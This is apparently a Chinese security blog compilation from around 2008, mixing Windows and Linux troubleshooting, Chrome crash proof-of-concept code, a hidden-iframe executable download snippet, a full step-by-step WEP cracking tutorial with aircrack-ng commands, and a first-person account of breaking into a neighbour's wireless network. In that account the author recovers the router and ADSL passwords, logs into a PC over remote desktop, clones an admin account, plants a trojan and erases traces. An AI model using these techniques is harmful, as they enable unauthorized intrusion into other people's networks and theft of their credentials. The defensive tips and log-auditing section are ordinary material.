买了台笔记本，带的vista系统，由于在家里用wpa2不广播的无线，总掉，所以干掉系统装xp。但是在装完sp3后更新了部分补丁后发现问题，update出现问题：

1、进行ms update，可以顺利下载，但是到了安装阶段总是安装失败；
2、系统设为自动更新，也是下载正常，到了安装阶段，安装失败；
3、自己到ms网站单个下载补丁下来，运行安装，可以安装成功。

首先声明我的Windows xp是正版的，在ms网站验证没问题，系统的补丁可以用360之类的更新，可是office的没办法，自动更新的黄色盾牌总出现提示office的补丁，但是无法安装，也不是个办法啊。尤其是这个是老婆的电脑，总因为这个被鄙视似乎也不好，好歹自己也是做安全的啊：（

最后四处查资料找到了解决方法：

在 Windows 中注册 wups2.dll 文件，具体操作步骤如下：

1、停止自动更新服务。为此，请按照下列步骤操作：
a、依次单击“开始”和“运行”，键入 cmd，然后单击“确定”弹出命令提示符窗口。
b、在命令提示符处，键入以下命令并按 Enter： net stop wuauserv

2、 注册 wups2.dll 文件。为此，请按照下列步骤操作：
a.、在命令提示符处，键入以下命令并按 Enter： regsvr32 %windir%\system32\ wups2.dll

注意：对于运行 Windows XP Professional x64 Edition 的计算机，
请输入以下命令，然后按 Enter： regsvr32 %windir%\syswow64\wups2.dll
b、在收到的验证消息上单击“确定”

3、启动自动更新服务。为此，请在命令提示符处键入以下命令，然后按 Enter： net start wuauserv

4、退出命令提示窗口。

5、再次到ms官网进行update，这次下载成功的那些都安装成功了，问题解决。

今天清除了几个莫名其妙的病毒

今天莫名其妙的中毒了：

windows defender报：

自动删除了2个exe文件。另外的dll文件上传到http://www.virscan.org/也查出问题了。很是奇怪，当时只用FeedDemon在浏览网站，难道又有什么0day，回头查查看能不能抓到。另外ast查历史记录发现了其他几个有问题的记录：

上传到http://www.virscan.org/只发现了2个有问题，另外2个我直接删除了，有问题的2个都是svchost调用的，其中dmserv.dll大部分报病毒，直接干掉了。sens.dll查了下md5发现是被改过了，直接干掉，sp3安装备份的自动恢复出来一个md5没有问题的版本。

10.31晚上不知道做什么了？难道opera也有0day？晚上一般只是lp看youku，当时的历史记录也是youku，有空查下怎么回事吧。

莫名其妙的。。。。。。

RHEL5.2 32位、64位、原码、扩展盘下载

RedHat企业版都update2了，5月21号发布的，偶都没关注。现在找到下载了：

http://rhel.ieesee.net/uingei/RHEL5.2/

yum源也更新到5.2了，方便大家在线升级：

http://rhel.ieesee.net/rhel5×86/
http://rhel.ieesee.net/rhel5×64/

有空下个升级看看。

今天发现一个不错的站

可惜要用代理，上面有不少好东东：

http://www.indianz.ch/

国内要用代理：

http://v52.net/index.php?q=uggc%3A%2F%2Fjjj.vaqvnam.pu%2Fjrypbzq.ugzy

谷歌浏览器第一个远程溢出漏洞

Google Chrome浏览器发布三天后，终于迎来了第一remote buffer overflow。
这个漏洞危害级别目前看来还不是那么高，毕竟需要用户手动的"save as"。
SVRT svrt at bkav.com.vn 发现的:
Google Chrome 0.2.149.27 'SaveAs' Function Buffer Overflow Vulnerability
两个POC:
http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html
http://security.bkis.vn/Proof-Of-Concept/PoC-Crash.html

谷歌浏览器Chrome的另一个崩溃漏洞和download漏洞

崩溃代码：

<table id="obj">
<script>
obj.createTFoot();
obj.deleteTFoot();
obj.focus();
obj.insertRow();
obj.insertRow();
</script>

点击 chrome_crash_fun.html 出现崩溃：

download代码：

<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

谷歌浏览器Chrome又一个崩溃漏洞

只要在Chrome的URL栏里输入“:%”字符,就可以将整个浏览器崩溃掉:

秒杀谷歌浏览器

谷歌浏览器0day，谷歌浏览器漏洞，Google Chrome 0da,Google Chrome vulnerability。

Goolge浏览器Chrome的确很cool。
不过有个哥们秒杀Chrome，更cool。

漏洞很简单, EVIL:%

用Chrome点击上面的连接就会如上图一样崩溃。

终于搞定家里的老移动硬盘启动live版的linux了

最近几天在研究几个live版本的linux，正好家里有个很老的移动硬盘：爱国者移动存储王10G的IBM的2.5寸盘，这次就废物利用了。结果发现各种版本的linux内核都不支持这个U盘，包括我的FreeBSD里面也能识别，但是报错:

dmesg:

umass0: ScanLogic USBIDE ScanLogic USBIDE, rev 1.01/2.40, addr 2
umass0: Invalid CSW: tag 336 should be 1
umass0: Invalid CSW: tag 524632 should be 2
umass0: Invalid CSW: tag 524632 should be 3
umass0: Invalid CSW: tag 524632 should be 4
umass0: Invalid CSW: tag 524632 should be 5
umass0: Invalid CSW: tag 524632 should be 6
(da0:umass-sim0:0:0:0): got CAM status 0x4
(da0:umass-sim0:0:0:0): fatal error, failed to attach to device
(da0:umass-sim0:0:0:0): lost device
umass0: Invalid CSW: tag 524632 should be 7
umass0: Invalid CSW: tag 524632 should be 8
umass0: Invalid CSW: tag 524632 should be 9
umass0: Invalid CSW: tag 524632 should be 10
umass0: Invalid CSW: tag 524632 should be 11
(da0:umass-sim0:0:0:0): removing device entry
umass0: at uhub3 port 1 (addr 2) disconnected
umass0: detached

在Linux下也有类似问题，Google了下，发现这个盘的芯片是用的ScanLogic SL11RIDE芯片组，找到一个帖子说：需要刷下硬件。http://www.qbik.ch/usb/devices/showdev.php?id=491

原来该芯片组内的flash里面的程序太旧，无法很好地支持linux。只要到scanlogic公司的主页上（现在已经是cypress公司了，不过升级程序还是可以从scanlogic.com下载）下载一个升级程序，写到flash里面就可以了。

准备照着操作一遍，但是发现scanlogic.com不存在了，而且找了n久也没找到上面提到的那个程序。还好我们有很好的工具：http://www.archive.org/。从这里终于找到了程序下载的缓存：http://web.archive.org/web/20020310122925/http://scanlogic.com/dvk/dvk/sl11ride/disk1/software/setup.exe
或者从我的附件里面下载。

下面说下具体操作过程：

1.找一台windows98第二版的机器。接上USB硬盘，安装驱动使得能够访问里面的分区。注意必须是windows98，不能用2000或XP。

2.下载升级程序。
到页面http://web.archive.org/web/20020307202004/http://scanlogic.com/dvk/dvk/sl11ride/disk1/readme.htm上面看英文说明；
下载驱动和升级程序：
http://web.archive.org/web/20020310122925/http://scanlogic.com/dvk/dvk/sl11ride/disk1/software/setup.exe

3.安装setup.exe，安装到C:默认目录下。看看开始菜单/程序/应该有了一个组scanlogic/usb2ide/，里面有一些批处理。运行usb2ide.bat。询问的时候以回车应答。直至运行结束。

4.现在就可以把USB硬盘插到FreeBSD的机器上了，用dmesg察看信息，略等一会，等linux初始化完毕usb后，就可以使用了。

dmesg

umass0: SL IDE SL IDE, rev 1.10/2.6c, addr 2
da0 at umass-sim0 bus 0 target 0 lun 0
da0: <  > Removable Direct Access SCSI-2 device
da0: 1.000MB/s transfers
da0: 9590MB (19640881 512 byte sectors: 255H 63S/T 1222C)

成功支持ScanLogic SL11RIDE芯片组的移动硬盘盒了。

往里面拷贝了BT3，改好bootinst.bat：
:setupNT
\boot\syslinux\syslinux.exe -ma -f -d \boot\syslinux %DISK%:
goto setupDone

然后重启改成从U盘重启，ok了，不在卡在挂在lzm那了。成功进入BT的界面。

附件：下载驱动和升级程序

WEP 密码破解教程 BT3 使用

本教程，目的是让大家可以了解破解无线网络的方式，从而加强自己的网络安全性。请不要用于非法目的。
另外，在互联网上，有太多的方法知道你是谁，不要以为用别人的AP就没人找得到你哦。
这里是一个较为详细的BT3  Backtrack 3 破解无线网WEP的一个教程。
首先
http://wiki.remote-exploit.org/index.php/HCL:Laptops
到这个地方确认你的笔记本电脑可以做这个事情。
基本新一点的都是兼容的。
其次，到这里确认你的无线网卡兼容
http://wiki.remote-exploit.org/index.php/HCL:Wireless
补充:
显卡兼容性是最大的问题,IBM X61这种Intel内置显卡是不支持的.
如果你启动不了图形界面，哪么考虑下面两个补丁：
ATI的驱动在这里:
http://wiki.remote-exploit.org/index.php/Modules
Navida的驱动在这里
http://www.offensive-security.com/modules/nvidia.lzm
将下载的模块copy到 x:\BT3\modules 文件夹里即可
然后开始下载你需要的BT3版本：
http://wiki.remote-exploit.org/index.php/Main_Page
个人建议：
如果随便玩玩，或者是台式机，可以下载CD版的那个，因为启动一次时间不短。
如果是笔记本，硬盘又大，可以下载 USB版的那个。
USB版：
http://www.remote-exploit.org/bt3b141207.rar.torrent
http://backtrack.mjdupree.com/bt3b141207.rar
ftp://bt3.aircrack-ng.org/bt3b141207.rar
下载完以后，可以装到一个可以启动的U盘里面，或者直接扔到硬盘上，后面我会说如何用硬盘直接启动这个东西。
-----------------如何变成启动盘--------------------
光盘版的，刻录完就好了，不提了。
USB版的， 随便解压缩到某个U盘的根目录，这样，根目录下有 BT3和Boot两个文件夹。
打开一个DOS窗口， 指向你的U盘目录，比如是H盘，那么
———运行———
H:  +回车
cd boot
bootinst.bat
按提示，确认你的确是在你的U盘的目录下操作。然后OK了。
重启时插入U盘即可启动，如果有任何问题，请确认你的电脑打开了U盘启动，并且被放在第一启动项（ThinkPad可以指定排除某个启动项的，请检查）
或者在启动时按住F12， 选择 U盘启动。
如果是硬盘启动，虽然有很多办法，但是为了VISTA和XP的兼容，个人推荐 DOS启动法，即先弄一个DOS的启动，比如弄一个MouseDOS一类的，傻瓜安装，可以让电脑启动进入纯DOS状态，然后在DOS情况下，进入硬盘上解压出的那个Boot目录里面，里面有个DOS 目录，然后执行BT3.bat 即可。
建议在执行BT3.bat前，先运行一下 Smartdrv.exe ,可以加快启动速度很多。（附件里有 Smartdrv.exe 98版）
小提示：DOS下的启动，不会自动进入图形界面，可以通过编辑 DOS目录里面的 CONFIG文件来实现：
只需要在CONFIG里面，最后加上一句：
autoexec=xconf;kdm
就可以了。
我顺便修改了MouseDOS的 Autoexec.bat文件，直接加上：
smartdrv.exe
D:
cd boot
cd dos
bt3.bat
这样启动直接进入了图形界面。
这时候的BT3，是全部在内存里的，也就是说，在系统内，任何对桌面和配置的改动都不会被记录，所以如果要记录文档，请不要放在桌面上。
———————————破解—————————————
以下是破解过程
WEP 破解
1) ifconfig -a
2) airmon-ng start wifi0 6
3) airodump-ng --ivs -w name -c 6 ath1
4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
-1 is -one
5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
新的第5步： aireplay-ng  -3  -b ap_mac -h XXXXXXXXXX -x  1024  ath1
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
7) aireplay-ng -2 -r mrarp -x 1024 ath1
8) aircrack-ng -n 64 -b ap_mac name-01.ivs
我提供了样板的文件供下载。
以下一一解释：（运行这些命令都需要打开终端窗口，可以使用Ctrl+C 从文本文件Copy， 然后 Shift+Insert 粘贴入终端窗口）
1）ifconfig -a
这个命令用于找到自己的无线网卡的 Mac地址。请记录下来备用。
2) airmon-ng start wifi0 6
这个命令用于将自己的无线网卡置于Monitor 模式，即类似一个AP的效果，因此可以有抓别人包的功能。
其中 wifi0 是我电脑里面给无线网卡的 ，一般应该都是这个，第一个ifconfig -a命令可以看得到。
wifi0 后面的那个6 ，是需要破解的AP的频道，如果不知道，可以在事前左下角开始菜单里面，找到 第二项 Internet 下面的倒数第二个画着 无线网的一个工具，用它可以看到那些需要破解的AP的频道（Channel）。
运行命令成功以后，你会看到返回的提示显示出现一个 Ath1（如果你是 Athoes的无线网卡的话就是这个，其他的可能不同，不过一般都是XXX1这样）
这个就是你的用于破解的网卡代号
这个命令，简而言之，就是把你的无线网卡置于监控模式，并且指定监控的频道。
如果你发现弄错了频道，那么没关系，重新运行一遍就可以了，不过这个时候，可能就会变成 Ath2...Ath3 等等，但是好像最多运行三次，然后就会失败。
3) airodump-ng --ivs -w name -c 6 ath1
这个命令比较关键，你运行以后，就会列出所有该频道的AP。
其中，6 是指你需要监控的频道，必须和第二个命令里的一样， ath1是刚才第二步出现的别名。
这个命令运行以后，显示的内容比较多，简单介绍一下：
BSSID : 其实就是AP的Mac 地址
PWR： AP信号的大小，一般，低于10，就比较麻烦了，丢包情况严重，比较难破解
RXQ： 干扰的大小
Beacons：发送接受的包，参考信息，在跳说明有数据
#Data： 这个比较重要，是接受到可以用来破解的特殊包，如果一直不变，那么，说明没有客户端连接，破解可能很麻烦，如果对方有大文件在下载，那么这个跳的速度非常快，10来分钟就可以有足够的包来破解了，如果跳得很慢，那么，就需要用一些特殊的方式来破解了。
CH：频道
MB：网络连接速度 54就是54MB
ENC， CIPHER，AUTH
这些是加密方式，我们这次只讨论显示为  WEP 和 WEP+ OPN的
如果显示 WPA TKIP 啥的，只能密码穷举破解，个人认为希望不大。
ESSID： 这个是AP的名字，需要用到的。如果是中文貌似会出问题。因此为了阻挡别人破解，可以用中文的ESSID
过一会儿，下面会显示哪些客户端连接到了哪些AP，针对有些Mac地址加密的，很容易模拟对方客户端的Mac从而骗进去，所以不要简单地相信Mac限制功能。
这个窗口就开着好了，不用关闭，以后的命令，需要重新打开一个终端窗口操作。
4）aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
这一步开始，我们要做一些真正的破解工作，主要是针对那些客户端仅仅连接，没什么流量的AP，这种AP，#Data的增长非常慢，往往需要很长的时间才有可能取得足够的包（一般5位的密码需要10000个包左右，更多的密码就要更多的。。。。）这个时候就需要 aireplay-ng 出面了，顾名思义，这个软件就是 Replay，也就是说，模拟发包。
首先解释命令：
-e ap_essid  就是  -e 之后加上你需要破解的essid ，比如 TP-LINK ， linksys 啥的，注意大小写。
-a ap_mac  就是  -a 之后加上你需要破解的AP的Mac地址，第三步BSSID就可以看得到。不需要 ：哦。
-h XXXXXXXXXX 就是 -h 之后，加上你的无线网卡的 Mac地址， 在第一步你可以得到。
ath1 ，上面解释过了。
一个样板例子：
aireplay-ng -1 0 -e TP-LINK -a 001900123456 -h 001900345678 ath1
这里有个小的建议，大家可以把以上的命令，都记录在一个文件里，然后把里面的XXXXXXXX都用自己的网卡Mac地址替换掉，这样就不需要每次都输入自己的Mac地址了。每次都可以用Copy Paste的方式来输入，这样可以有效防止什么1 和 l ， O和0 的混淆。
这一条命令，是用欺骗的方式，连接上那个AP，因此，如果网络信号不好，可能会执行不成功。
如果成功了，那么会显示Successful :>  字样。否则，请让信号强度大于10。
5）aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
上一条成功以后，我们需要开始收集那些需要的数据包，才能够进行模拟，并且破解。
所谓的需要的数据包，就是 #Data的数据，如果 #Data一直是0，那么可能会很麻烦，最好的情况是 #Data缓慢增长的这种情况。
解释一下
-b ap_mac 就是你需要破解的AP的Mac 地址，从第三步那里的 BSSID可以找得到。
-h XXXXXXXXXX  就是你自己网卡的Mac地址。
Ath1 和上面一样。。。。。
这一条命令的执行，和#data包有关，如果#Data 没有增加，则这个命令会一直执行，直到捕获一个#Data包。
捕获以后，程序会问你是否需要用这个包来模拟攻击。回答Y即可。
如果攻击成功，则会显示成功，失败往往是因为信号太差造成的， 如果攻击失败（往往是捕获的包有问题），程序重试N次以后，或自动重新开始捕捉包，继续进行即可。
等成功完成以后，会显示一个文件名：fragment-XXXXX-XXXXXX.xor
这个文件名，XXXXX里面是数字，是一个文件。马上会用得到。
这一步是最有可能失败的一步，尽量保持信号好一点。
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
第六步，参数比较多，解释一下：
-a ap_mac 是待破解的AP的Mac地址，
-h XXXXXXXXX 是你自己的无线网卡Mac地址
fragment-XXXXX-XXXXXX.xor  就是第五步显示的那个文件名。
这一步会很快做完， 显示生成文件到 mrarp啥的，其实就是破解包的准备过程。
7) aireplay-ng -2 -r mrarp -x 1024 ath1
这一步没哈可以修改的，参数解释一下
ath1 是 你的无线网卡的名字
1024 是攻击速度，1024是最大值了，如果你的无线网卡不是MiniPCI的，个人建议设为 512 ，这样不容易死机。
当这一步开始执行，你会看到 第一个终端窗口里面，你破解的那个AP后面的  #Data在飞速增长，一般是 200个/s的速度，我们只需等待即可
8）我们可以新打开一个终端窗口，当 #Data达到 10000个的时候，就可以测试破解了，很多密码都可以 10000左右#Data就算出来
新窗口中运行：
aircrack-ng -n 64 -b ap_mac name-01.ivs
解释一下，
-b ap_mac 对方AP的Mac地址
name-01.ivs 其实是第三步自动生成的一个文件， 如果你多次运行了第三步，那么，可能会生成多个 name-XX.ivs文件， 你可以到对应的文件夹里看一下（就在桌面上的第一个文件夹图标里），找到XX最大的那个，就是你当前正在使用的这个文件。
-n 64 是指破解64位的密码,如果10万以上Data都破解不出来,那就试试 -n 128,估计这个兄弟用了128位加密。
运行以后，如果运气好，一会儿就会显示破解出来的密码，同时会显示 对应的Assic码，如果不是标准Assic码，就是一串数字，记录下来，搞掂。
运气不好的情况，这个程序会继续等待更多的#Data，等到了，就会重新计算一次密码。
小结一下：
本教程只针对 WEP 密码的破解，而且，最好有得到认证的客户端连接在这个AP上，如果没有，有些AP（比如TP-LINK）能够被破解，某些可能就无法破解。
本教程也提供了 模拟Mac地址从而破解 Mac限制的方法
如果你需要你的AP很难被破解，建议：
1）用WPA 加密方式，并且使用不可能被字典猜到的密码，目前还是基本可靠的
2）如果只支持 WEP加密，那么，尽量考虑用隐藏 SSID的方式，这样可以增加破解难度
3）如果只支持 WEP加密，那么，可以考虑使用中文名字作为SSID，这样基本问题不大。
4）一般破解时候，大家都会选择常用的频道，例如 6频道，第三步显示频道的时候，你的AP也会被列出来，那么第一个目标失败的时候，黑客往往会选择第二个容易下手的目标， 但是如果你选择了8、 4、这些奇怪的频道，那么狠客往往懒得重新进入该频道的监控模式，你就可以逃过一劫。不过， 某些廉价AP，往往对6 频道做了优化，这个频道信号最强....这就没办法了。
5）有空换换你的密码：）
又注：联入网络以后，你可以管理他的AP，进行一些优化啥的，往往AP的密码，可能就是WEP的密码。
补充:
其中第5步:
aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1 可以用新命令替代:
aireplay-ng  -3  -b ap_mac -h XXXXXXXXXX -x  1024  ath1
这一条命令可以自动地捕捉包,自动的发送包,自动的存为文件.
因此,这一步执行以后,如果开始正确的发收包,则可以看到 Data开始上涨,不过貌似速度会慢一点,用老命令的话,每秒500个增加,用新命令可能只有200个/秒
当足够多的数据包出现以后,可以直接运行第八步,跳过6\7两步。

附件: [smartdrv.exe] SMARTDRV.zip (13.56 K)
附件: [破解命令] CRACK.zip (357 bytes)

一次小区内的无线路由入侵渗透测试

by:vitter@safechina.net
web:http://www.securitycn.net

　　前一段时间在我刚买无线路由的时候，拿笔记本在家做了次小区里面的无线路由渗透测试，籍此再次提醒大家，无线路由安全问题应该引起重视（参加以前文章：《无线不是舍己为人 网络安防同样重要》）。

　　查找网络发现有3个信号相当不错的SSID其中2个WPA加密，一个WEP（SSID是TP-LINK）加密。

图1 无线网络

　　我们知道WEP加密可以很容易破解掉（参加之前文章《破解无线网络WEP/WPA密钥》、《backtrack3(BT3) usb版 破解WEP无线网络密码详细步骤》、《BT3 破解有客户端无线WEP密码成功 完美支持Intel 2200BG》、《Intel 3945ABG用OmniPeek 4.1抓包破解WEP》），那我们就从WEP的下手吧，具体破解密码的方式就不在此叙述了，参加上述文章。

图2 密码拿到

　　密码拿到了，那我们下一步就是连入他的无线网络。

图3 网络连入ok

　　我分到的ip是：192.168.1.1xx

图4 我的ip

　　下面我们扫描踩点下他的网络。

图5-1 网络踩点1

图5-2 网络踩点2

　　由于他的SSID号使我们很容易就知道他应该用的无线路由器的型号：TP-LINK。通过扫描得到ip是192.168.1.1的无线路由开了80端口，我们尝试登录web管理。

图6 无线路由web管理

　　下一步用户名和密码，先用出厂默认的试试，不行，看来是改过密码的了。

图7 改过密码了

　　ok我们再猜猜看，之前扫描到一台主机，ip是192.168.1.1xx，主机名是guoxx，看来这家主人的名字应该叫guoxx，我们来试试看他的无线路由管理用户和密码会不会是这个。

图8 ok了

　　呵呵居然他用户名和密码都是这个，看来主人的安全意识很差啊。ok，我们下一步就是看看他的无线路由配置情况。发现了他是用无线路由器进行ADSL拨号的，运气不错。那从图上来看，有星号，我们试试密码不知道是否能找的到。

图9 adsl拨号配置

　　先查看源文件看看，不行，根本就不让查看源文件。看来TP-LINK还是做了限制的，那我们换一个浏览器看看，拿出Opera，再来查源码，用框架、源代码的方式（Ctrl+Shift+U）。

图10 Opera查源码

　　这次ok了，果真找到了明文的密码。

图11 明文密码

　　看来TP-LINK无线路由还是不安全啊，这么明显的漏洞都有，我用的也是这个品牌的产品啊，还好我都不用他拨号的，太不安全了，这个要给厂商反映下，让他们最好补了漏洞。

　　ok，我们找到了他的ADSL的帐号和密码，剩下的事情大家去想吧，有好多用处的哦。

　　回过头来我们再进行主机渗透，从图5-2来看，是XP系统，开了3389，以及共享。看来主人用过远程桌面啊。

　　我们再次用guoxx这个用户名和密码试试，不行。密码换成ADSL的密码，ok进去了，哈哈，今天运气真的很好啊，没费什么力气，本来还想着可能用到某些远程的漏洞，没想到这么简单就ok了，进去发现居然用搜狗输入法，呵呵，这个版本的还有登录漏洞可以利用，不过密码俺都有了，这个漏洞也没用上。剩下就是克隆个admin的帐号，种个小马，擦pp走人。

　　综上，我们需要注意的是：
　　一、无线尽量使用安全性稍高的WPA2，关闭DHCP，绑定MAC地址，SSID不进行广播。这样我们的无线网络就安全性高很多，如果别人进入不了我们的网络，这文章的下面都不成了了。
　　二、密码不要用自己的中英文名字，更不能用跟自己的主机名一样的，更不能用户名和密码一样，密码要大小写字母、数字、特殊符号都有8位以上的密码。
　　三、windows尽量关闭不需要的服务，尤其是远程桌面，打全补丁，第三方输入法尽量用安全版本的。

注：欢迎转载，请注明出处：中国安全网-安全您的网络

sshd:root@notty解决方法

很多人遇到如下问题，linux系统(假设是hosta)运行正常，但是用ssh user@hosta的时候一直等待，在hosta上有sshd:root@notty这样的进程(登陆用户不同可能显示不是root)，但是ssh user@hosta command却可以正常执行命令command。

问题出在sshd启动伪终端的时候，找不到/dev/ptmx这个设备文件或者/dev/pts这个文件系统没有mount。
解决方法是，首先检查是否有/dev/ptmx这个字符设备文件，如果没有用mknod /dev/ptmx c 5 2创建，然后用mount -t devpts devpts /dev/pts挂载/dev/pts文件系统。

Defcon 2008的ISO

下载地址：Download the Defcon16 ISO here

还有BlackHat 2008的：Download

透析Linux日志查入侵

日志对于网络安全来说无疑是非常重要的，它记录了系统每天发生的各种各样的事，你可以通过它来检查错误发生的原因，或者受到攻击后攻击者留下的痕迹。日志主要的功能有审计和监测，同时它也可以实时的监测系统状态，监测入侵者。

日志子系统分类
在Linux系统中，有三个主要的日志子系统：
连接时间日志——由多个程序执行，把纪录写入到/var/log/Wtmp和/var/run/Utmp，Login等程序更新Wtmp和Utmp文件，使系统管理员能够跟踪谁在何时登录到系统。
进程统计——由系统内核执行。当一个进程终止时，为每个进程往进程统计文件（Pacct或Acct）中写一个纪录。进程统计的目的是为系统中的基本服务提供命令使用统计。
错误日志——由Syslogd（8）执行。各种系统守护进程、用户程序和内核通过Syslog（3）向文件/var/log/messages报告值得注意的事件。另外有许多UNIX程序创建日志。像HTTP和FTP这样提供网络服务的服务器也保持详细的日志。
常用的日志文件如下：
Access-log：纪录HTTP/WEB的传输。
Acct/pacct：纪录用户命令。
Aculog：纪录MODEM的活动。
Btmp：纪录失败的纪录。
Lastlog：纪录最近几次成功登录的事件和最后一次不成功的登录。
Messages：从Syslog中记录信息（有的链接到Syslog文件）。
Sudolog：纪录使用Sudo发出的命令。
Sulog：纪录“su”的使用。
Utmp：纪录当前登录的每个用户。
Wtmp：一个用户每次登录进入和退出时间的永久纪录。
Xferlog：纪录FTP会话。

日志记录基本过程
Utmp、Wtmp和Lastlog日志文件是多数重用UNIX日志子系统的关键——保持用户登录进入和退出的纪录。有关当前登录用户的信息记录在文件Utmp中；登录进入和退出纪录在文件Wtmp中；最后一次登录文件可以用“Lastlog”命令察看。数据交换、关机和重起也记录在Wtmp文件中。所有的纪录都包含时间戳。这些文件（Lastlog通常不大）在具有大量用户的系统中增长十分迅速。例如Wtmp文件可以无限增长，除非定期截取。许多系统以一天或者一周为单位把Wtmp配置成循环使用。它通常由Cron运行的脚本来修改。这些脚本重新命名并循环使用Wtmp文件。

小知识：通常Wtmp在第一天结束后命名为Wtmp.1；第二天后Wtmp.1变为Wtmp.2，直到Wtmp.7。

每次有一个用户登录时，Login程序在文件Lastlog中察看用户的UID。如果找到了，则把用户上次登录、退出时间和主机名写到标准输出中，然后Login程序在Lastlog中纪录新的登录时间。在新的Lastlog纪录写入后，Utmp文件打开并插入用户的Utmp纪录。该纪录一直用到用户登录退出时删除。Utmp文件被各种命令文件使用，包括Who、Users和Finger。下一步，Login程序打开文件Wtmp附加用户的Utmp纪录。当用户登录退出时，具有更新时间戳的同一Utmp纪录附加到文件中。Wtmp文件被程序Last和AC使用。

查看具体日志
Wtmp和Utmp文件都是二进制文件，它们不能被诸如Tail命令剪贴或合并（需要使用Cat命令），用户需要使用Who、W、Users、Last和AC来使用这两个文件包含的信息。
1．Who：该命令查询Utmp文件并报告当前登录的每个用户。Who的缺省输出包括用户名、终端类型、登录日期及远程主机。例如输入Who回车后显示：
chyang pts/0 Aug 18 15:06
ynguo pts/2 Aug 18 15:32
ynguo pts/3 Aug 18 13:55
lewis pts/4 Aug 18 13:35
ynguo pts/7 Aug 18 14:12
ylou pts/8 Aug 18 14:15
如果指明了Wtmp文件名，则Who命令查询所有以前的纪录。命令“Who /var/log/Wtmp”将报告从Wtmp文件创建或删改以来的每一次登录。
2．W：该命令查询Utmp文件并显示当前系统中每个用户和它所运行的进程信息。
3．Users：Users用单独的一行显示出当前登录的用户，每个显示的用户名对应一个登录会话。如果一个用户有不止一个登录会话，那他的用户名将显示相同的次数。例如输入Users回车后显示：
chyang lewis lewis ylou ynguo ynguo
4．Last：Last命令往回搜索Wtmp，显示从文件第一次创建以来登录过的用户。例如：
chyang pts/9 202.38.68.242 Tue Aug 1 08:34 - 11:23 (02:49)
cfan pts/6 202.38.64.224 Tue Aug 1 08:33 - 08:48 (00:14)
chyang pts/4 202.38.68.242 Tue Aug 1 08:32 - 12:13 (03:40)
lewis pts/3 202.38.64.233 Tue Aug 1 08:06 - 11:09 (03:03)
lewis pts/2 202.38.64.233 Tue Aug 1 07:56 - 11:09 (03:12)
如果指明了用户，那么Last只报告该用户的近期活动，例如：last ynguo显示：
ynguo pts/4 simba.nic.ustc.e Fri Aug 4 16:50 - 08:20 (15:30)
ynguo pts/4 simba.nic.ustc.e Thu Aug 3 23:55 - 04:40 (04:44)
ynguo pts/11 simba.nic.ustc.e Thu Aug 3 20:45 - 22:02 (01:16)
ynguo pts/0 simba.nic.ustc.e Thu Aug 3 03:17 - 05:42 (02:25)
5．AC：AC命令根据当前的/var/log/Wtmp文件中的登录进入和退出来报告用户连结的时间（小时），如果不使用标志，则报告总的时间。例如：ac，显示：
total 5177.47
ac -d（回车）显示每天的总的连结时间：
Aug 12 total 261.87
Aug 13 total 351.39
Aug 14 total 396.09
Aug 15 total 462.63
Aug 16 total 270.45
ac -p（回车）显示每个用户的总的连接时间：
ynguo 193.23
yucao 3.35
rong 133.40
hdai 10.52
6．Lastlog：Lastlog文件在每次有用户登录时被查询。可以使用Lastlog命令来检查某特定用户上次登录的时间，并格式化输出上次登录日志/var/log/Lastlog的内容。它根据UID排序显示登录名、端口号（tty）和上次登录时间。例如：
rong 5 202.38.64.187 Fri
Aug 18 15:57:01 +0800 2000
dbb
**Never logged in**
xinchen
**Never logged in**
pb9511
**Never logged in**

小知识：如果一个用户从未登录过，Lastlog显示"**Never logged**。注意这个命令需要以ROOT权限运行。

另外，可在命令后加一些参数实现其它的功能，例如“last -u 102”将报告UID为102的用户，“last -t 7”表示限制上一周的报告。

进程审查
UNIX可以跟踪每个用户运行的每条命令，如果想知道昨晚别人弄乱了哪些重要的文件，进程统计子系统可以告诉你，这一点无疑对跟踪入侵者很有帮助。与连接时间日志不同，进程统计子系统缺省不激活，它必须启动。在Linux系统中启动进程统计使用Accton命令，必须用ROOT身份来运行。先使用Touch命令来创建Pacct文件：
touch /var/log/pact
然后运行Accton：
Accton /var/log/pact
一旦Accton被激活，就可以使用Lastcomm命令监测系统中任何时候执行的命令。若要关闭统计，可以使用不带任何参数的Accton命令。

小知识：Lastcomm命令报告以前执行的文件。不带参数时，Lastcomm命令显示当前统计文件生命周期内纪录的所有命令的有关信息。包括命令名、用户、TTY、命令耗费的CPU时间和一个时间戳。如果系统有许多用户，输入则可能很长。

进程统计存在的一个问题是Pacct文件可能增长的十分迅速。这时需要交互式或经过Cron机制运行SA命令来保持日志数据在系统控制内。

小知识：SA命令报告、清理并维护进程统计文件。它能把/var/log/pacct中的信息压缩到摘要文件/var/log/savacct和/var/log/usracct中。这些摘要包含按命令名和用户名分类的系统统计数据。SA缺省情况下先读它们，然后读Pacct文件，使报告能包含所有的可用信息。SA的输出有下面一些标记项：

Avio——每次执行的平均I/O操作次数
Cp——用户和系统时间总和，以分钟计
Cpu——和cp一样
K——内核使用的平均CPU时间，以1k为单位
K*sec——CPU存储完整性，以1k-core秒

Syslog设备
Syslog已被许多日志函数采纳，它用在许多保护措施中。Syslog可以纪录系统事件并写到一个文件或设备中，或给用户发送一个信息。它能纪录本地事件或通过网络纪录另一个主
机上的事件。
Syslog设备依据两个重要的文件：/etc/Syslogd（守护进程）和/etc/Syslog.conf配置文件，习惯上，多数Syslog信息被写到/var/adm或/var/log目录下的信息文件（messages.*）中。一个典型的Syslog纪录包括生成程序的名字和一个文本信息。它还包括一个设备和一个优先级范围，每个Syslog消息被赋予下面的主要设备之一：
LOG_AUTH——认证系统：Login、SU、Getty等。
LOG_CRON——Cron守护进程。
LOG_DAEMON——其它系统守护进程，如Routed。
LOG_FTP——文件传输协议：Ftpd、Tftpd。
LOG_KERN——内核产生的消息。
LOG_MAIL——电子邮件系统。
